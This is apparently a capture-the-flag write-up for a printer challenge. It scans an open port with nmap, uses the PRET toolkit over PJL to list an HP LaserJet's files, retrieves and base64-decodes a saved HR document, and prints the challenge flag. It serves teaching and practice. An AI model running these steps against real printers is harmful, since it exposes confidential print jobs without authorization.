Gawk
3 minutes to read
We are told that someone needs help with a printer. We only have an IP address and a port. nmap
does not show any useful information:
$ nmap -Pn -sV 167.99.207.74 -p 32108
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 167.99.207.74
Host is up (0.079s latency).
PORT STATE SERVICE VERSION
32108/tcp open unknown
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.94 seconds
Using PJL
After reading a bit on printer exploitation, I found PRET, which is a tool to interact with printers using PostScript or PJL (printer languages). It works with Python version 2, so let’s use a Docker container:
$ docker run --rm -v "${PWD}":/home/rocky -it python:2.7 bash
root@48962fe51979:/# pip2.7 install colorama
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting colorama
Downloading colorama-0.4.6-py2.py3-none-any.whl (25 kB)
Installing collected packages: colorama
Successfully installed colorama-0.4.6
WARNING: You are using pip version 20.0.2; however, version 20.3.4 is available.
You should consider upgrading via the '/usr/local/bin/python -m pip install --upgrade pip' command.
root@48962fe51979:/# python2.7 /home/rocky/PRET/pret.py 167.99.207.74:32108 pjl
________________
_/_______________/|
/___________/___//|| PRET | Printer Exploitation Toolkit v0.40
|=== |----| || by Jens Mueller <jens.a.mueller@rub.de>
| | ô| ||
|___________| ô| ||
| ||/.´---.|| | || 「 pentesting tool that made
|-||/_____\||-. | |´ dumpster diving obsolete‥ 」
|_||=L==H==||_|__|/
(ASCII art by
Jan Foerster)
Connection to 167.99.207.74:32108 established
Device: hp LaserJet 4200
Welcome to the pret shell. Type help or ? to list commands.
167.99.207.74:32108:/>
We see that we have successfully connected to a HP LaserJet printer. We can use these options:
167.99.207.74:32108:/> ?
Available commands (type help <topic>):
=======================================
append delete edit free info mkdir printenv set unlock
cat destroy env fuzz load nvram put site version
cd df exit get lock offline pwd status
chvol disable find help loop open reset timeout
close discover flood hold ls pagecount restart touch
debug display format id mirror print selftest traversal
For example:
167.99.207.74:32108:/> pwd
0:/
167.99.207.74:32108:/> ls
d - PJL
d - PostScript
d - saveDevice
d - webServer
Let’s enumerate all files and directories with find
:
167.99.207.74:32108:/> find
/PJL/
/PostScript/
/saveDevice/
/saveDevice/SavedJobs/
/saveDevice/SavedJobs/InProgress/
/saveDevice/SavedJobs/InProgress/HR_Policies.pdf
/saveDevice/SavedJobs/KeepJob/
/webServer/
/webServer/default/
/webServer/default/csconfig
/webServer/home/
/webServer/home/device.html
/webServer/home/hostmanifest
/webServer/lib/
/webServer/lib/keys
/webServer/lib/security
/webServer/objects/
/webServer/permanent/
There is a file that stands out (HR_Policies.pdf
). Let’s get it:
167.99.207.74:32108:/> get /saveDevice/SavedJobs/InProgress/HR_Policies.pdf
41893 bytes received.
167.99.207.74:32108:/> exit
I was expecting a PDF file, but it only contains ASCII data (in fact, a Base64-encoded string):
root@48962fe51979:/# file HR_Policies.pdf
HR_Policies.pdf: ASCII text
root@48962fe51979:/# cat HR_Policies.pdf
JVBERi0xLjQKJdPr6eEKMSAwIG9iago8PC9UaXRsZSAoQm9vayByZXBvcnQpCi9Qcm9kdWNlciAo
U2tpYS9QREYgbTk0IEdvb2dsZSBEb2NzIFJlbmRlcmVyKT4+CmVuZG9iagozIDAgb2JqCjw8L2Nh
IDEKL0JNIC9Ob3JtYWw+PgplbmRvYmoKNiAwIG9iago8PC9UeXBlIC9YT2JqZWN0Ci9TdWJ0eXBl
IC9JbWFnZQovV2lkdGggNDcKL0hlaWdodCA2Ci9Db2xvclNwYWNlIC9EZXZpY2VSR0IKL0JpdHNQ
ZXJDb21wb25lbnQgOAovRmlsdGVyIC9GbGF0ZURlY29kZQovTGVuZ3RoIDE5Pj4gc3RyZWFtCnic
k1v1UW4UjaJRRA0EAO2J5doKZW5kc3RyZWFtCmVuZG9iago3IDAgb2JqCjw8L1R5cGUgL1hPYmpl
Y3QKL1N1YnR5cGUgL0ltYWdlCi9XaWR0aCAxMjAwCi9IZWlnaHQgMzAKL0NvbG9yU3BhY2UgL0Rl
dmljZVJHQgovQml0c1BlckNvbXBvbmVudCA4Ci9GaWx0ZXIgL0ZsYXRlRGVjb2RlCi9MZW5ndGgg
MTMzPj4gc3RyZWFtCnic7cIxDQAADAMgJ/WfuquD2dgBIV1UVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVfXrA40qTc8KZW5kc3RyZWFtCmVuZG9iago4IDAgb2Jq
...
MCBuIAowMDAwMDIyNjUwIDAwMDAwIG4gCjAwMDAwMjMxMzQgMDAwMDAgbiAKMDAwMDAyOTQ4NSAw
MDAwMCBuIAowMDAwMDI5NzE0IDAwMDAwIG4gCjAwMDAwMjk5NDEgMDAwMDAgbiAKdHJhaWxlcgo8
PC9TaXplIDI4Ci9Sb290IDE1IDAgUgovSW5mbyAxIDAgUj4+CnN0YXJ0eHJlZgozMDM3MgolJUVP
Rg==
So, let’s decode it and save it as a proper PDF file:
root@48962fe51979:/# base64 -d HR_Policies.pdf > /home/rocky/HR_Policies.pdf
root@48962fe51979:/# file /home/rocky/HR_Policies.pdf
/home/rocky/HR_Policies.pdf: PDF document, version 1.4
root@48962fe51979:/# exit
exit
Flag
If we open the PDF file, we will see the flag in the first page:
HTB{tr4v3rs3_m4n4g3ment_d3240!}